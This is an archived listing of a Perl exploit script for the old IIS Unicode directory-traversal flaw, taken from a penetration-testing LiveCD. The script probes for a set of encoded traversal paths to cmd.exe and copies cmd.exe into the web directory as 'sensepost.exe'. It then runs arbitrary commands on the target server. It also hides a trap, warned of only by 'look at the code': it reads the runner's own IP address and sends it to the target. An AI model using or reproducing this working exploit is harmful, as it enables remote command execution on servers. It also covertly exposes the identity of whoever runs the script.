home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / unicodexecute3.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  4KB  |  111 lines

---

1. #!/usr/bin/perl
2. ######################## 
3. # Unicodexecute version3
4. # includes searches for alternative executable dirs
5. # please look at the code - you might be surprised what else I added
6. # checks for access denied added
7. # thnx to MH for testing etc.
8. # 
9. # Usage is same as previous version:
10. # unicodexecute3.pl target:port 'command'
11. #
12. # kids - please look at the code before you use it...:-]
13. # more info at http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
14. #
15. # 2001/01/24 Roelof Temmingh 
16. # roelof@sensepost.com
17. # http://www.sensepost.com
18. ##########################
19.  
20. use Socket;
21. my $runi; my $thedir; $|=1;
22. # --------------init
23. if ($#ARGV<1) {die "Usage: unicodexecute3 IP:port command\n";}
24. my ($host,$port)=split(/:/,@ARGV[0]);
25. my $target = inet_aton($host);
26. my $thecommand=@ARGV[1];
27. # -------------find the correct directory
28. my @unis=(
29. "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
30. "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c",
31. "/scripts/..%c0%af../winnt/system32/cmd.exe?/c",
32. "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
33. "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
34. "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
35. "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
36. "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c");
37. my $uni;my $execdir; my $dummy; my $line;
38. foreach $uni (@unis){
39.  print "testing directory $uni\n";
40.  my @results=sendraw("GET $uni+dir HTTP/1.0\r\n\r\n");
41.  foreach $line (@results){
42.   if ($line =~ /Directory/) {
43.   ($dummy,$execdir)=split(/Directory of /,$line);   
44.    $execdir =~ s/\r//g;
45.    $execdir =~ s/\n//g;
46.    if ($execdir =~ / /) {$thedir="%22".$execdir; $thedir=~ s/ /%20/g;}
47.     else {$thedir=$execdir;}
48.    print "farmer brown directory: $thedir\n";
49.    $runi=$uni; goto further;}
50.  }
51. }
52. die "nope...sorry..not vulnerable\n";
53.  
54. further:
55. # --------------test if cmd has been copied:
56. my $a=`which ifconfig`; chomp $a; 
57. my $aa=`$a -au | grep -i mask | grep -v 127.0.0.1 | head -n 1`; $aa=~s/ //g;
58. sendraw("GET /naughty_real_$aa\r\n\r\n");
59. my $failed=1;
60. my @unidirs=split(/\//,$runi);
61. my $unidir=@unidirs[1];
62. my $command="dir $thedir%22";
63. $command=~s/ /+/g;
64. my @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
65. my $line;
66. foreach $line (@results){
67.  if ($line =~ /denied/) {die "can't access above directory - try switching dirs order around\n";}
68.  if ($line =~ /sensepost.exe/) {print "sensepost.exe found on system\n"; $failed=0;}
69. }
70. #--------------we should copy it
71. my $failed2=1;
72. if ($failed==1) { 
73.  print "sensepost.exe not found - lets copy it\n";
74.  $command="copy c:\\winnt\\system32\\cmd.exe $thedir\\sensepost.exe%22";
75.  $command=~s/ /+/g;
76.  my @results2=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
77.  my $line2;
78.  foreach $line2 (@results2){
79.   if (($line2 =~ /copied/ )) {$failed2=0;}
80.   if (($line2 =~ /access/ )) {die "access denied to copy here - try switching dirs order around\n";}
81.  }
82.  if ($failed2==1) {die "copy of CMD.EXE failed - inspect manually:\n@results2\n\n"};
83. } 
84. # ------------ we can assume that the cmd.exe is copied from here..
85. my $path;
86. ($dummy,$path)=split(/:/,$thedir);
87. $path =~ s/\\/\//g;
88. $runi="/".$unidir."/sensepost.exe?/c";
89. $thecommand=~s/ /%20/g;
90. @results=sendraw("GET $runi+$thecommand HTTP/1.0\r\n\r\n");
91. foreach $line (@results){
92.  if ($line =~ /denied/) {die "sorry, access denied to write the upload page\n";}
93. }
94. print @results;
95.  
96. #-------------slightly modified RFP sendraw 
97. sub sendraw {
98.  my ($pstr)=@_;
99.  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
100.  if(connect(S,pack "SnA4x8",2,$port,$target)){
101.   my @in="";
102.   select(S); $|=1; print $pstr;
103.   while(<S>) {
104.    push @in,$_; last if ($line=~ /^[\r\n]+$/ );}
105.   select(STDOUT); return @in;
106.  } else { die("connect problems\n"); }
107. }
108. # Spidermark: sensepostdata unicode3
109.  
110.  
111.